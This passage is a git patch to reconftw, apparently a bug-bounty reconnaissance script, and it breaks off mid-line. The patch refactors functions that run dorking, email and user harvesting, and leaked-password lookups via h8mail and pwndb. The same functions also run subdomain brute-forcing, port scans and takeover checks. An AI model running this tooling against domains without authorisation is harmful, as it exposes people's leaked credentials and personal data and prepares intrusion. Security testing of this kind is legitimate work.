From 2fc578479a92ff5b5c890ea4469ebfedfbb55486 Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 12 Mar 2021 01:01:55 +0100 Subject: [PATCH 1/3] Code rewriting start/end func, wget blc, multidomain target allowed and spinner --- reconftw.cfg | 9 +- reconftw.sh | 777 ++++++++++++++++++++++++--------------------------- 2 files changed, 365 insertions(+), 421 deletions(-) diff --git a/reconftw.cfg b/reconftw.cfg index b091d01c..2ac2ff4c 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -27,10 +27,10 @@ GITHUB_TOKENS=${tools}/.github_tokens #SHODAN_API_KEY=XXXXXXXXXXXXX #XSS_SERVER=XXXXXXXXXXXXXXXXX #COLLAB_SERVER=XXXXXXXXXXXXXXXXX -findomain_virustotal_token=XXXXXXXXXXXXXXXXX -findomain_spyse_token=XXXXXXXXXXXXXXXXX -findomain_securitytrails_token=XXXXXXXXXXXXXXXXX -findomain_fb_token=XXXXXXXXXXXXXXXXX +#findomain_virustotal_token=XXXXXXXXXXXXXXXXX +#findomain_spyse_token=XXXXXXXXXXXXXXXXX +#findomain_securitytrails_token=XXXXXXXXXXXXXXXXX +#findomain_fb_token=XXXXXXXXXXXXXXXXX # File descriptors DEBUG_STD="&>/dev/null" @@ -64,6 +64,7 @@ PORTSCAN_ACTIVE=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true +URL_CHECK=true URL_GF=true JSCHECKS=true PARAMS=true diff --git a/reconftw.sh b/reconftw.sh index 229cc61d..6edc7d58 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -96,27 +96,23 @@ function tools_installed(){ function google_dorks(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] && [ "$GOOGLE_DORKS" = true ] then - start=`date +%s` - printf "${bgreen}#######################################################################\n" - printf "${bblue} Performing Google Dorks ${reset}\n\n" + start_func "Google Dorks in process" $tools/degoogle_hunter/degoogle_hunter.sh $domain | tee osint/dorks.txt sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/dorks.txt && touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="$\n${bblue} Google Dorks finished in ${runtime} Happy hunting! ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]} else - printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + if [ "$GOOGLE_DORKS" = false ]; then + printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi fi } function github_dorks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$GITHUB_DORKS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} GitHub Dorks Scanning ${reset}\n\n" - start=`date +%s` + start_func "Github Dorks in process" if [ -s "${GITHUB_TOKENS}" ] then if [ "$DEEP" = true ] ; then @@ -128,15 +124,9 @@ function github_dorks(){ else printf "\n${bred} Required file ${GITHUB_TOKENS} not exists or empty${reset}\n" fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n GitHub Dorks Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint/gitdorks.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} else - if [ "$DORKS" = false ]; then + if [ "$GITHUB_DORKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" @@ -147,19 +137,12 @@ function github_dorks(){ function metadata(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$METADATA" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Metadata scan ${reset}\n" - start=`date +%s` + start_func "Scanning metadata in public files" eval metafinder -d $domain -l 20 -o osint -go -bi -ba $DEBUG_STD eval mv osint/${domain}/* osint/ $DEBUG_ERROR eval rmdir osint/${domain} $DEBUG_ERROR touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Metadata scan finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} else if [ "$METADATA" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -172,15 +155,13 @@ function metadata(){ function emails(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$EMAILS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Emails search ${reset}\n" - start=`date +%s` + start_func "Searching emails/users/passwords leaks" cd $tools/theHarvester eval python3 theHarvester.py -d $domain -b all $DEBUG_ERROR > $dir/.tmp/harvester.txt cd $dir - cat .tmp/harvester.txt | awk '/Emails/,/Hosts/' | sed -e '1,2d' | head -n -2 | anew -q osint/emails.txt - cat .tmp/harvester.txt | awk '/Users/,/IPs/' | sed -e '1,2d' | head -n -2 | anew -q osint/users.txt - cat .tmp/harvester.txt | awk '/Links/,/Users/' | sed -e '1,2d' | head -n -2 | anew -q osint/linkedin.txt + cat .tmp/harvester.txt | awk '/Emails/,/Hosts/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/emails.txt + cat .tmp/harvester.txt | awk '/Users/,/IPs/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/users.txt + cat .tmp/harvester.txt | awk '/Links/,/Users/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/linkedin.txt eval h8mail -t $domain -q domain --loose -c $tools/h8mail_config.ini -j .tmp/h8_results.json $DEBUG_STD if [ -s ".tmp/h8_results.json" ] @@ -193,19 +174,13 @@ function emails(){ if [ "$PWNDB_STATUS" = 200 ] then cd $tools/pwndb - python3 pwndb.py --target "@${domain}" | anew -q $dir/osint/pwndb.txt + python3 pwndb.py --target "@${domain}" | anew -q $dir/osint/passwords.txt cd $dir else text="${yellow}\n pwndb is currently down :(\n\n Check xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion${reset}\n" printf "${text}" && printf "${text}" | $NOTIFY fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Emails Search Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} else if [ "$EMAILS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -219,10 +194,7 @@ function emails(){ function domain_info(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$DOMAIN_INFO" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Domain info search ${reset}\n" - start=`date +%s` - + start_func "Searching domain info (whois, registrant name/email domains)" lynx -dump https://domainbigdata.com/${domain} | tail -n +19 > osint/domain_info_general.txt cat osint/domain_info_general.txt | grep '/nj/' | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_name.txt @@ -251,13 +223,7 @@ function domain_info(){ lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_ip.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_ip.txt done fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Domain Info Search Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} else if [ "$DOMAIN_INFO" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -303,14 +269,11 @@ function subdomains_full(){ NUMOFLINES_probed=$(eval cat webs/webs.txt $DEBUG_ERROR | anew .tmp/probed_old.txt | wc -l) fi printf "${bblue}\n Total subdomains: ${reset}\n\n" - text="${bred}\n - ${NUMOFLINES_subs} new alive subdomains${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "- ${NUMOFLINES_subs} new alive subdomains" good eval cat subdomains/subdomains.txt $DEBUG_ERROR | sort - text="${bred}\n - ${NUMOFLINES_probed} new web probed${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "- ${NUMOFLINES_probed} new web probed" good eval cat webs/webs.txt $DEBUG_ERROR | sort - text="${bblue}\n Subdomain Enumeration Finished\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "Subdomain Enumeration Finished" good printf "${bblue} Results are saved in subdomains/subdomains.txt and webs/webs.txt${reset}\n" printf "${bgreen}#######################################################################\n\n" } @@ -318,8 +281,9 @@ function subdomains_full(){ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then - start=`date +%s` - printf "${yellow} Running : Passive Subdomain Enumeration${reset}\n" + start_subfunc "Running : Passive Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Passive Subdomain Enumeration${reset}\n\n" eval subfinder -d $domain -o .tmp/subfinder.txt $DEBUG_STD eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder.txt eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass.txt $DEBUG_STD @@ -327,13 +291,11 @@ function sub_passive(){ eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat.txt timeout 5m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls.txt NUMOFLINES=$(eval cat .tmp/subfinder.txt .tmp/assetfinder.txt .tmp/amass.txt .tmp/findomain.txt .tmp/crobat.txt .tmp/waybackurls.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by passive found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains found with passive techniques in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -342,8 +304,9 @@ function sub_passive(){ function sub_crt(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBCRT" = true ] then - start=`date +%s` - printf "${yellow} Running : Crtsh Subdomain Enumeration${reset}\n" + start_subfunc "Running : Crtsh Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Crtsh Subdomain Enumeration${reset}\n\n" cd $tools/crtfinder eval python3 crtfinder.py -u $domain $DEBUG_STD outputfile=${domain%%.*} @@ -372,12 +335,10 @@ function sub_crt(){ fi touch $called_fn_dir/.${FUNCNAME[0]} NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | anew .tmp/crtsh_subs.txt | wc -l) - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by certificate transparency found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by certificate transparency found in ${runtime}" good else if [ "$SUBCRT" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -390,17 +351,16 @@ function sub_crt(){ function sub_brute(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBBRUTE" = true ] then - start=`date +%s` - printf "${yellow} Running : Bruteforce Subdomain Enumeration${reset}\n" + start_subfunc "Running : Bruteforce Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Bruteforce Subdomain Enumeration${reset}\n\n" eval shuffledns -d $domain -w $subs_wordlist -r $resolvers -t 5000 -o .tmp/active_tmp.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/active_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/brute_subs.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by bruteforce found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by bruteforce found in ${runtime}" good else if [ "$SUBBRUTE" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -413,22 +373,21 @@ function sub_brute(){ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then - start=`date +%s` - printf "${yellow} Running : Active Subdomain Enumeration${reset}\n" + start_subfunc "Running : Active Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Active Subdomain Enumeration${reset}\n\n" cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt eval shuffledns -d $domain -list .tmp/subs_no_resolved.txt -r $resolvers -t 5000 -o .tmp/subdomains_tmp.txt $DEBUG_STD echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt dnsx -retry 3 -silent -cname -resp-only -l .tmp/subdomains_tmp.txt | grep ".$domain$" | anew -q .tmp/subdomains_tmp.txt eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD - NUMOFLINES=$(cat .tmp/subdomains_tmp.txt | anew subdomains/subdomains.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by dns resolution found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by dns resolution found in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -437,20 +396,19 @@ function sub_dns(){ function sub_scraping(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBSCRAPING" = true ] then - start=`date +%s` - printf "${yellow} Running : Source code scraping subdomain search${reset}\n\n" + start_subfunc "Running : Source code scraping subdomain search" + #start=`date +%s` + #printf "${yellow} Running : Source code scraping subdomain search${reset}\n\n" touch .tmp/scrap_subs.txt cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt gospider -S .tmp/probed_tmp.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt cat .tmp/scrap_subs.txt | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/scrap_subs_resolved.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by scraping found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by scraping found in ${runtime}" good else if [ "$SUBSCRAPING" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -463,8 +421,9 @@ function sub_scraping(){ function sub_permut(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBPERMUTE" = true ] then - start=`date +%s` - printf "${yellow} Running : Permutations Subdomain Enumeration${reset}\n" + start_subfunc "Running : Permutations Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Permutations Subdomain Enumeration${reset}\n\n" if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 50 ]] then eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute1_tmp.txt $DEBUG_STD @@ -499,13 +458,11 @@ function sub_permut(){ else NUMOFLINES=0 fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by permutations found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by permutations found in ${runtime}" good else if [ "$SUBPERMUTE" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -518,23 +475,14 @@ function sub_permut(){ function subtakeover(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBTAKEOVER" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Subdomain Takeover ${reset}\n\n" - start=`date +%s` + start_func "Looking for possible subdomain takeover" touch .tmp/tko.txt cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -o .tmp/tko.txt NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end if [ "$NUMOFLINES" -gt 0 ]; then - text="${bred}\n ${NUMOFLINES} new possible takeovers found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "${NUMOFLINES} new possible takeovers found in ${runtime}" good fi - text="${bblue}\n Subdomain Takeover Finished\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in webs/takeover.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]} else if [ "$SUBTAKEOVER" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -551,18 +499,15 @@ function subtakeover(){ function webprobe_simple(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBESIMPLE" = true ] then - start=`date +%s` - printf "${yellow} Running : Http probing${reset}\n\n" + start_subfunc "Running : Http probing" cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new websites resolved in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new websites resolved in ${runtime}" good else if [ "$WEBPROBESIMPLE" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -575,23 +520,12 @@ function webprobe_simple(){ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} ${bgreen} Web Probe ${reset}\n\n" - printf "${yellow} Running : Http probing non standard ports${reset}\n\n" - start=`date +%s` + start_func "Http probing non standard ports" cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads 150 -timeout 10 -silent -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${bred}\n Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR - fi - printf "${bblue}\n Web Probe Finished\n" - printf "${bblue} Results are saved in webs/webs_uncommon_ports.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}" good + eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR + end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} else if [ "$WEBPROBEFULL" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -604,18 +538,10 @@ function webprobe_full(){ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} ${bgreen} Web Screenshot ${reset}\n\n" - start=`date +%s` + start_func "Web Screenshots" eval gowitness file -f webs/webs.txt --disable-db --disable-logging $DEBUG_ERROR eval gowitness file -f webs/webs_uncommon_ports.txt --disable-db --disable-logging $DEBUG_ERROR - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Web Screenshot Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in screenshots folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -632,9 +558,7 @@ function screenshot(){ function favicon(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FAVICON" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} FavIcon Hash Extraction ${reset}\n\n" - start=`date +%s` + start_func "Favicon Ip Lookup" cd $tools/fav-up eval python3 favUp.py -w $domain -sc -o favicontest.json $DEBUG_STD if [ -f "favicontest.json" ] @@ -645,13 +569,7 @@ function favicon(){ eval mv favicontest.txt $dir/hosts/favicontest.txt $DEBUG_ERROR eval rm favicontest.json $DEBUG_ERROR fi - cd $dir && touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n FavIcon Hash Extraction Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in hosts/favicontest.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]} else if [ "$FAVICON" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -664,10 +582,7 @@ function favicon(){ function portscan(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PORTSCANNER" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Port Scan ${reset}\n\n" - start=`date +%s` - + start_func "Port scan" for sub in $(cat subdomains/subdomains.txt); do echo "$sub $(dig +short a $sub | tail -n1)" | anew -q hosts/subdomains_ips.txt done @@ -679,6 +594,7 @@ function portscan(){ printf "${bblue}\n Resolved IP addresses (No WAF) ${reset}\n\n"; eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort + printf "${bblue}\n Scanning ports... ${reset}\n\n"; if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "${domain}_portscan_passive.txt" ] then for sub in $(cat .tmp/ips_nowaf.txt); do @@ -691,14 +607,7 @@ function portscan(){ eval nmap --top-ports 1000 -sV -n --max-retries 2 -iL .tmp/ips_nowaf.txt -oN hosts/portscan_active.txt $DEBUG_STD fi - #eval cat portscan.txt $DEBUG_ERROR - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Port scan Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in portscan_[passive|active].txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} else if [ "$PORTSCANNER" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -716,20 +625,12 @@ function portscan(){ function waf_checks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WAF_DETECTION" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} ${bgreen} Detecting WAF in websites ${reset}\n\n" - start=`date +%s` + start_func "Website's WAF detection" wafw00f -i webs/webs.txt -o .tmp/wafs.txt &>/dev/null cat .tmp/wafs.txt | sed -e 's/^[ \t]*//' -e 's/ \+ /\t/g' -e '/(None)/d' | tr -s "\t" ";" > webs/webs_wafs.txt NUMOFLINES=$(eval cat webs/webs_wafs.txt $DEBUG_ERROR | wc -l) - text="${bblue}\n ${NUMOFLINES} websites protected by waf ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - printf "${bblue}\n WAF Detecion Finished in ${runtime}\n" - printf "${bblue} Results are saved in screenshots folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "${NUMOFLINES} websites protected by waf" info + end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} else if [ "$WAF" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -742,36 +643,29 @@ function waf_checks(){ function nuclei_check(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$NUCLEICHECK" = true ] then - printf 